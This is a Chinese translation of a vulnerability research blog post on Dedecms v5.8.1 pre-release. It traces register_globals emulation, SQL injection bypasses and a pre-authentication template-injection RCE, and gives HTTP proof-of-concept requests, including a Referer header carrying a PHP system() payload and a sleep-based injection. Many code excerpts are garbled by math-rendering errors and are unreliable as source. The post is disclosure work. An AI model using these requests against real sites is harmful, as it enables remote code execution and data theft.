Dedecms 中的预认证远程代码执行

在这篇博文中,我将分享对 Dedecms(或翻译成英文的“Chasing a Dream”CMS)的技术评论,包括它的攻击面以及它与其他应用程序的不同之处。最后,我将结束一个影响v5.8.1 预发布的预认证远程代码执行漏洞。这是一款有趣的软件,因为它自最初发布以来已有 14 年的历史,而且 PHP 多年来发生了很大变化。

对于网上搜索“什么是中国最大的CMS”很快发现,多 源 的状态是DEDECMS是最流行的。然而,这些来源几乎都有一个共同点:它们都是旧的。



该产品部署非常广泛,但自2020 年 12 月 11 日推出以来,此处详述的漏洞影响了少数站点,并且从未将其纳入发布版本。


function _RunMagicQuotes(&KaTeX parse error: Expected '}', got 'EOF' at end of input: … if (is_array(svar)) {
foreach ($svar as $_k => $_v) {
s v a r [ svar[ svar[_k] = _RunMagicQuotes($_v);

    } else {
        if (strlen($svar) > 0 && preg_match('#^(cfg_|GLOBALS|_GET|_POST|_COOKIE|_SESSION)#', $svar)) {
            exit('Request var not allow!');
        $svar = addslashes($svar);
return $svar;



if (!defined(‘DEDEREQUEST’)) {
//检查和注册外部提交的变量 (2011.8.10 修改登录时相关过滤)
function CheckRequest(&KaTeX parse error: Expected '}', got 'EOF' at end of input: … if (is_array(val)) {
foreach ($val as $_k => KaTeX parse error: Expected '}', got 'EOF' at end of input: … if (_k == ‘nvarname’) {

    } else {
        if (strlen($val) > 0 && preg_match('#^(cfg_|GLOBALS|_GET|_POST|_COOKIE|_SESSION)#', $val)) { // 2
            exit('Request var not allow!');


foreach (array('_GET', '_POST', '_COOKIE') as $_request) {
    foreach ($$_request as $_k => $_v) {
        if ($_k == 'nvarname') {
            ${$_k} = $_v;
        } else {
            ${$_k} = _RunMagicQuotes($_v); // 1


如果我们在这里密切注意,我们可以在[1]看到代码重新启用,该代码register_globals已在PHP 5.4 中删除。

register_globals过去一直是应用程序的一个大问题,并且支持非常丰富的攻击面,这也是 PHP 过去声誉不佳的原因之一。还要注意,它们不保护[2]处的全局数组 S E R V E R 或 _SERVER或 SERVER_FILES超级全局数组。

这可能会导致行[3] 中的开放重定向 http://target.tld/dede/co_url.php?_SERVER[SERVER_SOFTWARE]=PHP%201%20Development%20Server&_SERVER[SCRIPT_NAME]=或 phar 反序列化等风险include/

foreach ($_FILES as $_key => KaTeX parse error: Expected '}', got 'EOF' at end of input: …{ foreach (keyarr as KaTeX parse error: Expected '}', got 'EOF' at end of input: … if (!isset(FILES[ k e y ] [ _key][ key][k])) {
exit(“DedeCMS Error: Request Error!”);
if (preg_match(’#^(cfg
|GLOBALS)#’, $_key)) {
exit(‘Request var not allow for uploadsafe!’);
$$_key = F I L E S [ _FILES[ FILES[_key][‘tmp_name’];
KaTeX parse error: Expected '}', got 'EOF' at end of input: {_key . ‘_name’} = F I L E S [ _FILES[ FILES[_key][‘name’]; // 4
KaTeX parse error: Expected '}', got 'EOF' at end of input: {_key . ‘_type’} = F I L E S [ _FILES[ FILES[_key][‘type’] = preg_replace(’#[^0-9a-z./]#i’, ‘’, F I L E S [ _FILES[ FILES[_key][‘type’]);
KaTeX parse error: Expected '}', got 'EOF' at end of input: {_key . ‘_size’} = F I L E S [ _FILES[ FILES[_key][‘size’] = preg_replace(’#[^0-9]#’, ‘’, F I L E S [ _FILES[ FILES[_key][‘size’]);

if (is_array(${$_key . '_name'}) && count(${$_key . '_name'}) > 0) {
    foreach (${$_key . '_name'} as $key => $value) {
        if (!empty($value) && (preg_match("#\.(" . $cfg_not_allowall . ")$#i", $value) || !preg_match("#\.#", $value))) {
            if (!defined('DEDEADMIN')) {
                exit('Not Admin Upload filetype not allow !');
} else {
    if (!empty(${$_key . '_name'}) && (preg_match("#\.(" . $cfg_not_allowall . ")$#i", ${$_key . '_name'}) || !preg_match("#\.#", ${$_key . '_name'}))) {
        if (!defined('DEDEADMIN')) {
            exit('Not Admin Upload filetype not allow !');

if (empty(${$_key . '_size'})) {
    ${$_key . '_size'} = @filesize($$_key); // 3

GET /plus/recommend.php?_FILES[poc][name]=0&_FILES[poc][type]=1337&_FILES[poc][tmp_name]=phar:///path/to/uploaded/phar.rce&_FILES[poc][size]=1337 HTTP/1.1
Host: target
我没有报告这些错误,因为它们没有产生任何影响(否则我会称它们为漏洞)。开放 URL 重定向错误本身无法进一步攻击攻击者,如果没有小工具链,则无法触发 phar 反序列化错误。

不过,训练有素的眼睛会发现一些特别有趣的东西。在第[4] 行,代码使用_name未过滤的字符串创建了一个攻击者控制的变量_RunMagicQuotes。这意味着具有管理员凭据的攻击者可以sys_payment.php通过_RunMagicQuotes使用文件上传绕过该函数来触发脚本中的 SQL 注入:


作为参考,我们可以看到 SQL 注入在内部是如何表现的dede/sys_payment.php:

else if (KaTeX parse error: Expected '}', got 'EOF' at end of input: …{ // 5 if (pay_name == “” || $pay_desc == “” || $pay_fee == “”) { // 6
ShowMsg(“您有未填写的项目!”, “-1”);
$row = KaTeX parse error: Expected 'EOF', got '#' at position 30: …SELECT * FROM `#̲@__payment` WHE…pid’");
if ($cfg_soft_lang == ‘utf-8’) {
c o n f i g = A u t o C h a r s e t ( u n s e r i a l i z e ( u t f 82 g b ( config = AutoCharset(unserialize(utf82gb( config=AutoCharset(unserialize(utf82gb(row[‘config’])));
} else if ($cfg_soft_lang == ‘gb2312’) {
c o n f i g = u n s e r i a l i z e ( config = unserialize( config=unserialize(row[‘config’]);
$payments = “‘code’ => '” . r o w [ ′ c o d e ′ ] . " ′ , " ; f o r e a c h ( row['code'] . "',"; foreach ( row[code].",";foreach(config as $key => $v) {
c o n f i g [ config[ config[key][‘value’] = KaTeX parse error: Expected '}', got 'EOF' at end of input: {key};
$payments .= “’” . $key . “’ => '” . c o n f i g [ config[ config[key][‘value’] . “’,”;
p a y m e n t s = s u b s t r ( payments = substr( payments=substr(payments, 0, -1);
$payment = “$payment=array(” . $payments . “)”;
$configstr = “<” . “?php\r\n” . KaTeX parse error: Can't use function '\r' in math mode at position 12: payment . "\̲r̲\n?" . ">\r\n";…payment)) {
$m_file = DEDEDATA . “/payment/” . $row[‘code’] . “.php”;
f p = f o p e n ( fp = fopen( fp=fopen(m_file, “w”) or die("写入文件 s a f e c o n f i g f i l e 失 败 , 请 检 查 权 限 ! " ) ; f w r i t e ( safeconfigfile 失败,请检查权限!"); fwrite( safeconfigfile");fwrite(fp, c o n f i g s t r ) ; f c l o s e ( configstr); fclose( configstr);fclose(fp);
if ($cfg_soft_lang == ‘utf-8’) {
c o n f i g = A u t o C h a r s e t ( config = AutoCharset( config=AutoCharset(config, ‘utf-8’, ‘gb2312’);
c o n f i g = s e r i a l i z e ( config = serialize( config=serialize(config);
c o n f i g = g b 2 u t f 8 ( config = gb2utf8( config=gb2utf8(config);
} else {
c o n f i g = s e r i a l i z e ( config = serialize( config=serialize(config);

$query = "UPDATE `#@__payment` SET name = '$pay_name',fee='$pay_fee',description='$pay_desc',config='$config',enabled='1' WHERE id='$pid'"; // 7
$dsql->ExecuteNoneQuery($query); // 8

在[5]和[6] 处,有一些检查 d o p o s t 设 置 为 c o n f i g 和 dopost设置为config和 dopostconfigpay_name, p a y d e s c 并 且 pay_desc并且 paydescpay_fee是从请求中设置的。稍后在[7]代码使用提供的攻击者构建原始 SQL 查询$pay_name,最后在[8]我认为触发了 SQL 注入…

过去,Dedecms 开发人员受到SQL 注入漏洞的严重打击(可能是由于register_globals在源代码级别启用)。在上面的例子中,我们得到了服务器的响应Safe Alert: Request Error step 2,当然我们的注入失败了。这是为什么?查看include/dedesqli.class.php以了解:

function CheckSql($db_string, $querytype = ‘select’)

// ...more checks...

if (strpos($clean, 'union') !== false && preg_match('~(^|[^a-z])union($|[^[a-z])~s', $clean) != 0) {
    $fail = true;
    $error = "union detect";

// ...more checks...

elseif (preg_match('~\([^)]*?select~s', $clean) != 0) {
    $fail = true;
    $error = "sub select detect";
if (!empty($fail)) {
    fputs(fopen($log_file, 'a+'), "$userIP||$getUrl||$db_string||$error\r\n");
    exit("<font size='5' color='red'>Safe Alert: Request Error step 2!</font>");  // 9
} else {
    return $db_string;


public function Execute($id = "me", $sql = '')


    if ($this->safeCheck) {


public function SetQuery($sql)
    $prefix = "#@__";
    $sql = trim($sql);
    if (substr($sql, -1) !== ";") {
        $sql .= ";";
    $sql = str_replace($prefix, $GLOBALS['cfg_dbprefix'], $sql);

    CheckSql($sql, $this->getSQLType($sql)); // 5.7前版本仅做了SELECT的过滤,对UPDATE、INSERT、DELETE等语句并未过滤。
    $this->queryString = $sql;


public function GetTableFields($tbname, $id = "me")
    global $dsqli;
    if (!$dsqli->isInit) {
    $prefix = "#@__";
    $tbname = str_replace($prefix, $GLOBALS['cfg_dbprefix'], $tbname);
    $query = "SELECT * FROM {$tbname} LIMIT 0,1";
    $this->result[$id] = mysqli_query($this->linkID, $query);


if (KaTeX parse error: Expected '}', got 'EOF' at end of input: … if (empty(tablearr)) {
ShowMsg(‘你没选中任何表!’, ‘javascript:;’);
if (!is_dir(KaTeX parse error: Expected '}', got 'EOF' at end of input: … MkdirAll(bkdir, $cfg_dir_purview);

if (empty($nowtable)) {
    $nowtable = '';
if (empty($fsize)) {
    $fsize = 20480;
$fsizeb = $fsize * 1024;

if ($nowtable == '') {
else {
    $j = 0;
    $fs = array();
    $bakStr = '';

    $dsql->GetTableFields($nowtable); // 10

GET /dede/sys_data_done.php?dopost=bak&tablearr=1&nowtable=%23@__vote+where+1=sleep(5)–+& HTTP/1.1
Host: target
Cookie: PHPSESSID=jr66dkukb66aifov2sf2cuvuah;


m a g i c q u o t e s g p c = i n i g e t ( ′ m a g i c q u o t e s g p c ′ ) ; f u n c t i o n F i l t e r A l l ( magic_quotes_gpc = ini_get('magic_quotes_gpc'); function _FilterAll( magicquotesgpc=iniget(magicquotesgpc);functionFilterAll(fk, &$svar)
global $cfg_notallowstr, $cfg_replacestr, m a g i c q u o t e s g p c ; i f ( i s a r r a y ( magic_quotes_gpc; if (is_array( magicquotesgpc;if(isarray(svar)) {
foreach ($svar as $_k => $_v) {
s v a r [ svar[ svar[_k] = _FilterAll($fk, KaTeX parse error: Expected 'EOF', got '}' at position 14: _v); }̲ } else { …cfg_notallowstr != ‘’ && preg_match("#" . $cfg_notallowstr . “#i”, $svar)) {
ShowMsg(" KaTeX parse error: Expected 'EOF', got '}' at position 62: …xit(); }̲ if (cfg_replacestr != ‘’) {
$svar = preg_replace(’/’ . $cfg_replacestr . ‘/i’, “***”, KaTeX parse error: Expected 'EOF', got '}' at position 16: svar); }̲ } if (…magic_quotes_gpc) {
s v a r = a d d s l a s h e s ( svar = addslashes( svar=addslashes(svar);
return $svar;

/* 对_GET,_POST,_COOKIE进行过滤 */
foreach (array(’_GET’, ‘_POST’, ‘_COOKIE’) as KaTeX parse error: Expected '}', got 'EOF' at end of input: …{ foreach ($_request as $_k => $_v) {
KaTeX parse error: Expected '}', got 'EOF' at end of input: {_k} = _FilterAll($_k, KaTeX parse error: Expected 'EOF', got '}' at position 10: _v); }̲ } 你能看出这里有什么问题吗…magic_quotes_gpc配置中的代码集。如果它没有在php.inithen 中设置,则addslashes调用。但是我们可以通过$magic_quotes_gpc在请求中使用并重写该变量并避免addslashes!


else if(KaTeX parse error: Expected '}', got 'EOF' at end of input: …//检查验证码 if(cfg_feedback_ck==‘Y’)
v a l i d a t e = i s s e t ( validate = isset( validate=isset(validate) ? strtolower(trim($validate)) : ‘’;
s v a l i = s t r t o l o w e r ( t r i m ( G e t C k V d V a l u e ( ) ) ) ; i f ( svali = strtolower(trim(GetCkVdValue())); if( svali=strtolower(trim(GetCkVdValue()));if(validate != $svali || $svali==’’)

if($comtype == 'comments')
    $arctitle = addslashes($arcRow['arctitle']);
    $arctitle = $arcRow['arctitle'];
        $inquery = "INSERT INTO `#@__bookfeedback`(`aid`,`catid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`)
               VALUES ('$aid','$catid','$username','$bookname','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); ";  // 11
        $rs = $dsql->ExecuteNoneQuery($inquery); // 12
            echo $dsql->GetError();

在[11] 中,我们可以看到代码使用攻击者控制的输入(例如 c a t i d 和 ) 构 建 查 询 catid和 )构建查询 catidbookname。有可能进入这个接收器并绕过addslashes触发未经身份验证的 SQL 注入:

POST /plus/bookfeedback.php?action=send&fid=1337&validate=FS0Y&isconfirm=yes&comtype=comments HTTP/1.1
Host: target
Cookie: PHPSESSID=0ft86536dgqs1uonf64bvjpkh3;
Content-Type: application/x-www-form-urlencoded
Content-Length: 70

我们设置了会话 cookie,因为它与存储在未经身份验证的会话中的验证码相关联:


CheckSql幸运的是,我无法绕过(不),但我可以绕过并从数据库中泄漏一些数据,因为我可以同时使用 c a t i d 和 catid和 catidbookname进行注入,然后(ab)使用第二个命令:

else if($action==‘quote’)
$row = KaTeX parse error: Expected 'EOF', got '#' at position 30: …Select * from `#̲@__bookfeedback…fid’");
$dtp = new DedeTemplate();
d t p − > L o a d T e m p l a t e ( dtp->LoadTemplate( dtp>LoadTemplate(cfg_basedir.$cfg_templets_dir.’/plus/bookfeedback_quote.htm’);
KaTeX parse error: Expected 'EOF', got '}' at position 29: …); exit(); }̲ 我所要做的就是猜测fid(主键)并通过注入$msg的检查它是否匹配pwn,如果匹配,我知道注入的结果已显示给我:


然而,这个 SQL 注入是有限的,因为我不能使用select,sleep或benchmark关键字,因为它们被CheckSql函数拒绝了。自从发现该漏洞以来,开发人员似乎/plus/bookfeedback.php在最新版本中删除了该文件,但绕过的核心问题addslashes仍然存在。在这一点上,如果我们要找到关键漏洞,我们需要关注不同的错误类别。


ShowMsg 模板注入远程代码执行漏洞
CVSS: 9.8 (/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
版本:5.8.1 预发布
未经身份验证的攻击者可以针对易受攻击的 Dedecms 版本执行任意代码。


if ($dopost == ‘save’) {
v a l i d a t e = i s s e t ( validate = isset( validate=isset(validate) ? strtolower(trim($validate)) : ‘’;
s v a l i = G e t C k V d V a l u e ( ) ; i f ( svali = GetCkVdValue(); if ( svali=GetCkVdValue();if(validate == ‘’ || $validate != $svali) {
ShowMsg(‘验证码不正确!’, ‘-1’); // 1
在[1] 处,我们可以观察到ShowMsg在 中定义的调用include/common.func.php:

function ShowMsg($msg, $gourl, $onlymsg = 0, KaTeX parse error: Expected '}', got 'EOF' at end of input: … if (empty(GLOBALS[‘cfg_plus_dir’])) {
KaTeX parse error: Expected 'EOF', got '}' at position 37: …'] = '..'; }̲ if (gourl == -1) { // 2
g o u r l = i s s e t ( gourl = isset( gourl=isset(_SERVER[‘HTTP_REFERER’]) ? S E R V E R [ ′ H T T P R E F E R E R ′ ] : ′ ′ ; / / 3 i f ( _SERVER['HTTP_REFERER'] : ''; // 3 if ( SERVER[HTTPREFERER]:;//3if(gourl == “”) {
$gourl = -1;

$htmlhead = "
$htmlfoot = "

$litime = ($limittime == 0 ? 1000 : $limittime);
$func = '';


if ($gourl == '' || $onlymsg == 1) {
} else {
    $func .= "var pgo=0;
  function JumpUrl(){
    if(pgo==0){ location='$gourl'; pgo=1; }
    $rmsg = $func;
    if ($onlymsg == 0) {
        if ($gourl != 'javascript:;' && $gourl != '') {
            $rmsg .= "<br /><a href='{$gourl}'>如果你的浏览器没反应,请点击这里...</a>";
            $rmsg .= "<br/></div>\");\r\n";
            $rmsg .= "setTimeout('JumpUrl()',$litime);";
        } else {
    } else {
    $msg = $htmlhead . $rmsg . $htmlfoot;

$tpl = new DedeTemplate();
$tpl->LoadString($msg); // 4
$tpl->Display(); // 5

我们可以在[2]中看到,如果 g o u r l 设 置 为 − 1 , 则 攻 击 者 可 以 通 过 引 用 标 头 控 制 [ 3 ] gourl设置为 -1,则攻击者可以通过引用标头控制[3] gourl1[3]gourl处的变量。该变量未过滤并嵌入到变量中,该变量由[4]处的调用加载并由[5]处的调用解析。在里面我们发现:$msgLoadStringDisplayinclude/dedetemplate.class.php

class DedeTemplate
public function LoadString($str = ‘’)
$this->sourceString = $str; // 6
h a s h c o d e = m d 5 ( hashcode = md5( hashcode=md5(this->sourceString);
$this->cacheFile = $this->cacheDir . “/string_” . $hashcode . “.inc”;
$this->configFile = $this->cacheDir . “/string_” . $hashcode . “”;

public function Display()
    global $gtmpfile;
    extract($GLOBALS, EXTR_SKIP);
    $this->WriteCache(); // 7
    include $this->cacheFile; // 9

在[6]的sourceString设置与攻击者控制的$msg。然后在[7] 处 WriteCache被调用:

public function WriteCache($ctype = 'all')
    if (!file_exists($this->cacheFile) || $this->isCache == false
        || (file_exists($this->templateFile) && (filemtime($this->templateFile) > filemtime($this->cacheFile)))
    ) {
        if (!$this->isParse) {
        $fp = fopen($this->cacheFile, 'w') or dir("Write Cache File Error! ");
        flock($fp, 3);
        $result = trim($this->GetResult()); // 8
        $errmsg = '';     
        if (!$this->CheckDisabledFunctions($result, $errmsg)) { // 9
        fwrite($fp, $result);

在[8] 处,代码调用GetResult返回值sourceString来设置 r e s u l t 变 量 , 该 变 量 现 在 包 含 攻 击 者 控 制 的 输 入 。 在 [ 9 ] 处 , 该 C h e c k D i s a b l e d F u n c t i o n s 函 数 在 result变量,该变量现在包含攻击者控制的输入。在[9] 处,该CheckDisabledFunctions函数在 result[9]CheckDisabledFunctionsresult变量上被调用。让我们看看是什么CheckDisabledFunctions:

public function CheckDisabledFunctions($str, &$errmsg = '')
    global $cfg_disable_funs;
    $cfg_disable_funs = isset($cfg_disable_funs) ? $cfg_disable_funs : 'phpinfo,eval,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,file_put_contents,fsockopen,fopen,fwrite';
    // 模板引擎增加disable_functions
    if (!defined('DEDEDISFUN')) {
        $tokens = token_get_all_nl($str);
        $disabled_functions = explode(',', $cfg_disable_funs);
        foreach ($tokens as $token) {
            if (is_array($token)) {
                if ($token[0] = '306' && in_array($token[1], $disabled_functions)) {
                    $errmsg = 'DedeCMS Error:function disabled "' . $token[1] . '" <a href="" target="_blank">more...</a>';
                    return false;
    return true;



GET /plus/flink.php?dopost=save&c=id HTTP/1.1
Host: target
Referer: <?php “system”($c);die;/*







当前余额3.43前往充值 >
领取后你会自动成为博主和红包主的粉丝 规则
钱包余额 0


